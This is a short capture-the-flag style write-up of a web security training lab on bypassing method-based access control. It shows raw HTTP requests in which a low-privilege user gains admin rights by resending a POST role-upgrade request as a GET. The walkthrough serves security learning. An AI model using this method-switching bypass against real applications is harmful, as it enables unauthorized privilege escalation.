Method-based access control can be circumvented

This lab implements access controls based partly on the HTTP method of requests. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.

Starting with administrator privileges, I explored the available functionalities and discovered the "upgrade" feature capable of elevating user roles to administrators. For analyzing purposes I tried to upgrade "carlos," and upon inspecting the request, it appeared as follows:

POST /admin-roles HTTP/2
Host: ****.web-security-academy.net
Cookie: session=XsqrYt4o8QomLoJpncRksvEPlLoTtdAP
Content-Length: 30
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
...

username=carlos&action=upgrade

After logging out, I relogged in as "wiener" and attempted to replicate the request to upgrade "wiener" to an admin. Surprisingly, the attempt failed using the POST method. However, after switching the method to GET, the upgrade succeeded, leading to the successful resolution of the lab:

GET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: ****.web-security-academy.net
Cookie: session=poV8GzZZIcBjp6JlAvpWXdUR6f5p1LDq
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"

PreviousURL-based access control can be circumvented NextMulti-step process with no access control on one step

Last updated 2 years ago